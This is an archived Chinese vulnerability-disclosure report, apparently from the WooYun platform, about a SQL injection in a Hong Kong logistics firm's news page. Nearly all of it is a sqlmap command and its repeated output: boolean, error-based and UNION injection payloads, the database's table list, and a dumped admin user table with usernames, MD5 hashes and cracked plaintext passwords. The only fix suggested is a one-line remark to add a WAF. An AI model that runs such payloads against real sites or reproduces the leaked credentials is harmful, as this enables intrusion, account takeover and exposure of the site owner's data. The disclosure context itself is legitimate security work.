乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
期达(香港)国际物流有限公司于2006年在香港注册处登记注册并正式营业。运输方式以中港进出口快运服务,国际快递(UPS/DHL/FEDEX),国际海运,国际空运为主;服务范围贯穿货物运输、仓储及港区派送等领域,运输产品涵盖了化工、建材、纺织、食品、制药、电器、高科技产品等各行各业。并拥有报关、报检,代理退税等各种代理资格。本公司于广州、深圳、东莞设有分部,能为客户随时报告货物情况及运作详情,让客户清楚知道运载过程中的最新进度。运载程序完成后,对文件的回送处理,更有快捷、妥善之安排。公司提供合理的运输服务收费,准时快捷的运输服务,优质的文档处理及后勤服务。以此来协助贵司应对竞争激烈,形势多变的市场。 我们的核心业务是港澳台运输专线与国际快递代理,其中包含大陆各区到香港运输、澳门运输、台湾海运,提供港澳台贸易进出口运输和快件进口运输,优质的门到门一站式服务。我们属于专业的“中港物流”公司,与国内物流运输有很大区别,我们在香港、澳门、台湾地区专为照顾国内工厂及台湾客户而设,令一些在香港没有设立办事处的客户减轻工作量。本公司特为客户提供一张全面的一条龙服务订单,可代客户于香港报关及清关。本公司的储仓服务更专为一些未到船期或货期的货物而设,代客上船公司转单、转文件、大陆车直接出入仓交收。为客户度身订造适合的中港运作,以减轻客户的负担。我们做得专注,只为提供更优质的物流运输服务!
地址:http://**.**.**.**/index.php?c=news&a=detail&pid=2&id=94
python sqlmap.py -u "http://**.**.**.**/index.php?c=news&a=detail&pid=2&id=94" -p id --technique=BEU --random-agent -D qida -T sp_user -C id,username,password,pass,email --dump
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=news&a=detail&pid=2&id=94 AND 9485=9485 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=news&a=detail&pid=2&id=94 AND (SELECT 5618 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(5618=5618,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: c=news&a=detail&pid=2&id=94 UNION ALL SELECT NULL,CONCAT(0x7171717671,0x56574475667641635253577a4d4c6e6a6b575262575566644958676b4978424d7a634b5667566b67,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0current user: 'qida@localhost'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=news&a=detail&pid=2&id=94 AND 9485=9485 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=news&a=detail&pid=2&id=94 AND (SELECT 5618 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(5618=5618,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: c=news&a=detail&pid=2&id=94 UNION ALL SELECT NULL,CONCAT(0x7171717671,0x56574475667641635253577a4d4c6e6a6b575262575566644958676b4978424d7a634b5667566b67,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0database management system users [1]:[*] 'qida'@'localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=news&a=detail&pid=2&id=94 AND 9485=9485 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=news&a=detail&pid=2&id=94 AND (SELECT 5618 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(5618=5618,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: c=news&a=detail&pid=2&id=94 UNION ALL SELECT NULL,CONCAT(0x7171717671,0x56574475667641635253577a4d4c6e6a6b575262575566644958676b4978424d7a634b5667566b67,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] qidasqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=news&a=detail&pid=2&id=94 AND 9485=9485 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=news&a=detail&pid=2&id=94 AND (SELECT 5618 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(5618=5618,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: c=news&a=detail&pid=2&id=94 UNION ALL SELECT NULL,CONCAT(0x7171717671,0x56574475667641635253577a4d4c6e6a6b575262575566644958676b4978424d7a634b5667566b67,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0Database: qida[27 tables]+------------------+| sp_address || sp_article || sp_article_cat || sp_articlefavor || sp_ask || sp_askvalue || sp_config || sp_download || sp_favor || sp_feedback || sp_goods || sp_goods_attr || sp_goods_color || sp_goods_type || sp_goodscat || sp_goodsfloder || sp_goodsimg || sp_goodsrar || sp_member || sp_membernews || sp_memberproduct || sp_orderlist || sp_pageimg || sp_qq || sp_question_list || sp_user || sp_userbanner |+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=news&a=detail&pid=2&id=94 AND 9485=9485 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=news&a=detail&pid=2&id=94 AND (SELECT 5618 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(5618=5618,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: c=news&a=detail&pid=2&id=94 UNION ALL SELECT NULL,CONCAT(0x7171717671,0x56574475667641635253577a4d4c6e6a6b575262575566644958676b4978424d7a634b5667566b67,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0Database: qidaTable: sp_user[8 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| create_time | datetime || email | varchar(30) || flag | tinyint(1) || id | int(11) || menuflag | varchar(255) || pass | varchar(255) || password | varchar(50) || username | varchar(30) |+-------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=news&a=detail&pid=2&id=94 AND 9485=9485 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: c=news&a=detail&pid=2&id=94 AND (SELECT 5618 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (ELT(5618=5618,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: c=news&a=detail&pid=2&id=94 UNION ALL SELECT NULL,CONCAT(0x7171717671,0x56574475667641635253577a4d4c6e6a6b575262575566644958676b4978424d7a634b5667566b67,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0Database: qidaTable: sp_user[3 entries]+----+----------+-------------------------------------------+--------+---------+| id | username | password | pass | email |+----+----------+-------------------------------------------+--------+---------+| 1 | admin | e10adc3949ba59abbe56e057f20f883e (123456) | 123456 | <blank> || 2 | xiaoq | e10adc3949ba59abbe56e057f20f883e (123456) | 123456 | <blank> || 3 | cgjcgs | bf9017d04f72c1b5ba407971fbf61289 (chang) | chang | NULL |+----+----------+-------------------------------------------+--------+---------+
上WAF。
危害等级:高
漏洞Rank:12
确认时间:2015-11-04 18:02
已將事件通知有關機構
暂无